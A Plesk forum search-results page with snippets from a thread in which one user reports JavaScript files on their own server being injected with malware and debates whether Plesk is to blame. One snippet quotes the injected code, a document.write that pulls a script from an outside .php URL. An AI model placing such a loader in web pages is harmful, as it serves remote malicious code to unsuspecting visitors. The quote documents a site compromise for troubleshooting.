• If you are still using CentOS 7.9, it's time to convert to Alma 8 with the free centos2alma tool by Plesk or Plesk Migrator. Please let us know your experiences or concerns in this thread:
    CentOS2Alma discussion
  • Please beaware of a breaking change in the REST API on the next Plesk release (18.0.62).
    Starting from Plesk Obsidian 18.0.62, requests to REST API containing the Content-Type header with a media-type directive other than “application/json” will result in the HTTP “415 Unsupported Media Type” client error response code. Read more here

Search results

  1. O

    Plesk 11.x Linux VULNERABILITY: JavaScript injection

    I already googled for several terms but I didn't find useful info. I also came across that page you're linking, but there it's explaining how JS files can get appended content when loaded from a browser by using ".htaccess". In my case, the actual JS files were physically modified, not just...
  2. O

    Plesk 11.x Linux VULNERABILITY: JavaScript injection

    Thanks for the link, but I don't think we're having that problem. Our code have very few instances where an "include" or "require" statement depends on a query string or post value, but in the cases where there are statements which depend in a query value, they were already properly checked so...
  3. O

    Plesk 11.x Linux VULNERABILITY: JavaScript injection

    So you mean this is not a vulnerability in Plesk? Can you please explain how can someone modify JS files in OUR SERVER without having FTP access? We're not using a CMS with code freely available in the net, it's an own development and nobody has access to the code, plus our code never writes...
  4. O

    Plesk 11.x Linux VULNERABILITY: JavaScript injection

    We're getting most JS files in our server injected with malware code. Something like this: /*cc3b29*/ document.write("<script src='http://quadfreunde-nordeifel.de/kalender/wHXy6DBL.php?id=132732700' type='text/javascript'></" + "script>"); /*/cc3b29*/ Or this: /*820a93*/...
Back
Top